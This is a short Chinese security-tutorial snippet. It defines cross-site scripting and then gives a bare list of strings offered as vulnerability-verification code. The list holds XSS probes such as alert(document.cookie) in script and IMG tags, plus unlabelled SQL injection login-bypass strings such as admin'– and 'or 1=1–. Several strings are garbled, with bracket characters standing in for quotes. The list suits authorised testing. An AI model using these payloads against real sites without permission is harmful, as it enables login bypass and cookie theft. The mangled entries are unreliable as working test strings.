XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 相关测试代码,可供 漏洞 验证: ><script>alert(document.cookie)</script> =’><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> <script>alert(’XSS’)</script> <IMG SRC=]javascript:alert(’XSS’);]> <IMG SRC=javascript:alert(’XSS’)> <IMG SRC=JaVaScRiPt:alert(’XSS’)> <IMG SRC=JaVaScRiPt:alert("XSS")> admin’– ’or 0=0 – [or 0=0 – or 0=0 – ’or 0=0 # [or 0=0 # or 0=0 # ’or ’x’=’x [or ]x]=]x ’) or (’x’=’x ’or 1=1– [or 1=1– or 1=1– ’or a=a– [or ]a]=]a ’) or (’a’=’a [) or ([a]=]a hi] or ]a]=]a hi] or 1=1 – hi’ or 1=1 – hi’ or ’a’=’a hi’) or (’a’=’a hi]) or ([a]=]a
查看更多关于XSS漏洞验证语句 - 网站安全 - 自学php的详细内容...